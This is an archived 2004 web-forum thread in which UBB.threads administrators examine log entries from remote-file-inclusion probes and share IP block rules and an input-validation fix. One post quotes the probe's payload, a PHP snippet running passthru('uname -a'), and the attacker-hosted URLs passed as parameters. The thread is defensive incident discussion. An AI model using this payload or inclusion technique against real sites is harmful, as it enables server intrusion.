Previous Thread
Next Thread
Print Thread
Rate Thread
Joined: Oct 1999
Posts: 282
Enthusiast
Enthusiast
Offline
Joined: Oct 1999
Posts: 282
Today I found some entrys in the ubb.t logs I never saw before:

Code
Fri, Sep 24 2004 15:21:38 +0200<br />193.150.170.160	Unable to do_query:<br />SELECT B_Main,B_Board<br />FROM w3t_Posts<br />WHERE B_Number = http://193.150.170.160/4do4sjr?<br />- You have an error in your SQL syntax...


There are several entrys like this one from different ubb.t scripts. All were called with http://193.150.170.160/4do4sjr? as a parameter instead of a post number. This went on for some hours, so maybe someone was manually going through the scripts.

If I call http://193.150.170.160/4do4sjr? I get this result:
<?php echo "\nbl3"; echo "bl3 "; passthru("uname -a 2>&1"); ?>

Someone trying to hack the forum?

Sponsored Links
Joined: Mar 2000
Posts: 528
Junior Member
Junior Member
Offline
Joined: Mar 2000
Posts: 528
Actually yes, it looks that way.

Joined: Aug 2000
Posts: 1,290
Addict
Addict
Offline
Joined: Aug 2000
Posts: 1,290
Nav, could someone be mining for cookies, (hoping someone will enter the url etc in a browser)?

Last edited by J.C.; 09/24/2004 11:32 PM.

- Custom Web Development
http://www.JCSWebDev.com
Joined: Nov 2001
Posts: 10,369
I type Like navaho
I type Like navaho
Joined: Nov 2001
Posts: 10,369
Judging by the IP, my guess is they were mining for email addresses.

Are you running search engine friendly URLs? If so, sometimes relational links can end up inserted into your own URL, as the variables are hidden in a way (using slashes) that they appear to be directories.

I wouldn't worry about it.

Joined: Jul 2001
Posts: 808
Coder
Coder
Joined: Jul 2001
Posts: 808
found something else:

Tue, Sep 21 2004 15:46:47 +0200
66.89.120.35 Unable to do_query:
SELECT DISTINCT Cat_Title,Cat_Number,Cat_Description
FROM w3t_Category
WHERE Cat_Type = 'forum'
AND Cat_Number = http://66.89.120.35/ebekpko?
ORDER BY Cat_Number
- You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '://66.89.120.35/ebekpko?
ORDER BY Cat_Number' at line 4

if you enter the IP you come to "Foothills Bible Church"

Very strange.

Sponsored Links
Joined: Sep 2003
Posts: 488
Code Monkey
Code Monkey
Joined: Sep 2003
Posts: 488
It's *most definitely* a hacking attempt being waged via hacked servers.

I recommend that you block these 4 IP#'s in an .htaccess file placed in your root ftp directory (if using Apache)...

193.150.170.160
81.23.227.170
66.89.120.35
65.39.172.139

ex.

<Limit GET>
order deny,allow
deny from 193.150.170.160
deny from 81.23.227.170
deny from 66.89.120.35
deny from 65.39.172.139
allow from all
</Limit>

If any other such IP#'s show up in your logs, just add 'em in.

Joined: Oct 1999
Posts: 282
Enthusiast
Enthusiast
Offline
Joined: Oct 1999
Posts: 282
[]Twisty said:
193.150.170.160
81.23.227.170
66.89.120.35
65.39.172.139
[/]
In my ubb.t logs I can find exactly these IPs in the last few days. And one more:
65.61.221.51

Joined: Sep 2003
Posts: 488
Code Monkey
Code Monkey
Joined: Sep 2003
Posts: 488
Add that one in as well.

They are attempting to find vulnerabilities in all of your scripts in order to gain access to the server and hijack it.

* Poorly/incorrectly coded scripts can cause serious security problems

Joined: Nov 2001
Posts: 10,369
I type Like navaho
I type Like navaho
Joined: Nov 2001
Posts: 10,369
I don't think that can find any vulnerabilities - I see this alot of you're using Search Engine friendly URLs and any relative links. It's not SQL injection they are trying, it's just a URL.

The link can end up being

http://www.yourdomain.com/ubbthreads/ubbthreads.php/Cat/http://66.89.120.35

If the URL on your site, ends up ending with a trailing slash, any other links can look relative. The jibberish at the end might be part of the session ID? If you're using the search engine URLs you'll see alot of this.

Joined: Sep 2003
Posts: 488
Code Monkey
Code Monkey
Joined: Sep 2003
Posts: 488

Sponsored Links
Joined: Nov 2001
Posts: 10,369
I type Like navaho
I type Like navaho
Joined: Nov 2001
Posts: 10,369
Hrm... interesting - I'm still not sure how that code would execute inside a query like that - in the example in that thread, they are including a php file as a result of the variable received via URL.

I'm pretty sure the addslashes calls in threads would foil that, right? That would screw up the quote marks in the included scripts.

Joined: Sep 2003
Posts: 488
Code Monkey
Code Monkey
Joined: Sep 2003
Posts: 488
Here's another for you, nice & long

http://solidox.org/index.php?w=module:article,action:view,id:11

(I already posted a mod for these broken url's btw hehe)

Joined: Oct 1999
Posts: 282
Enthusiast
Enthusiast
Offline
Joined: Oct 1999
Posts: 282
Even if this is no security problem to ubb.t. Wouldn't it be at least cleaner to verify all the parameters to be an int instead of letting the database find out.

Joined: Feb 2002
Posts: 2,286
Veteran
Veteran
Joined: Feb 2002
Posts: 2,286
[]Twisty said:
(I already posted a mod for these broken url's btw hehe) [/]

Must have missed that one... goes off to search....


Fans Focus - Focusing on Fans of Sport

(Okay - mainly football (the British variety wink at the moment - but expanding all the time....)
Joined: Dec 2000
Posts: 1,471
Addict
Addict
Offline
Joined: Dec 2000
Posts: 1,471
@Maze & Twisty: What version of ubb.threads are you using?

Joined: Sep 2003
Posts: 488
Code Monkey
Code Monkey
Joined: Sep 2003
Posts: 488
6.3.2 over here.

Joined: Sep 2003
Posts: 488
Code Monkey
Code Monkey
Joined: Sep 2003
Posts: 488
[]Ian_W said:

Must have missed that one... goes off to search.... [/]

It's a really simple change Ian, takes 2 seconds...

https://www.ubbdev.com/forum/showflat...true#Post110699

I notice a lot more sites using commas in their URL's these days.

Joined: Dec 2000
Posts: 1,471
Addict
Addict
Offline
Joined: Dec 2000
Posts: 1,471
Ah, ok. There have been some security fixes in 6.4.x and 6.5.

You should add some additional checks to showflat.php and showthreaded.php to validate the input.

Find if (!$Number) {

and change to:

if (!$Number || !is_numeric($Number)) {

Joined: Oct 1999
Posts: 282
Enthusiast
Enthusiast
Offline
Joined: Oct 1999
Posts: 282
The log entrys are from 6.4.2. Since some days I run 6.5, since the upgrade no more of these entrys were logged.

Joined: Sep 2003
Posts: 488
Code Monkey
Code Monkey
Joined: Sep 2003
Posts: 488
Thanks for the heads-up Astaran []http://graemlins.mameworld.info/graemlins/thumbsup.gif[/]

Joined: Oct 1999
Posts: 282
Enthusiast
Enthusiast
Offline
Joined: Oct 1999
Posts: 282
ah, that was included in the 6.5 update. Good to hear.

Joined: Jul 2001
Posts: 808
Coder
Coder
Joined: Jul 2001
Posts: 808
If anyone here can read german visit: http://www.heise.de/newsticker/meldung/51838

Its an official warning from DFN Computer Emergency Response Teams (CERT) to keep an eye on unsecure server configurations. Maybe you can read this true babelfish.altavista.com

Joined: Oct 1999
Posts: 282
Enthusiast
Enthusiast
Offline
Joined: Oct 1999
Posts: 282
Interessant, Danke!


Link Copied to Clipboard
Donate Today!
Donate via PayPal

Donate to UBBDev today to help aid in Operational, Server and Script Maintenance, and Development costs.

Please also see our parent organization VNC Web Services if you're in the need of a new UBB.threads Install or Upgrade, Site/Server Migrations, or Security and Coding Services.
Recommended Hosts
We have personally worked with and recommend the following Web Hosts:
Stable Host
bluehost
InterServer
Visit us on Facebook
Member Spotlight
Ruben Rocha
Ruben Rocha
Lutz,FL,USA
Posts: 254
Joined: January 2000
Forum Statistics
Forums63
Topics37,573
Posts293,925
Members13,849
Most Online5,166
Sep 15th, 2019
Today's Statistics
Currently Online
Topics Created
Posts Made
Users Online
Birthdays
Top Posters
AllenAyres 21,079
JoshPet 10,369
LK 7,394
Lord Dexter 6,708
Gizmo 5,833
Greg Hard 4,625
Top Posters(30 Days)
Top Likes Received
isaac 82
Gizmo 20
Brett 7
WebGuy 2
Morgan 2
Top Likes Received (30 Days)
None yet
The UBB.Developers Network (UBB.Dev/Threads.Dev) is ©2000-2024 VNC Web Services

 
Powered by UBB.threads™ PHP Forum Software 8.0.0
(Preview build 20221218)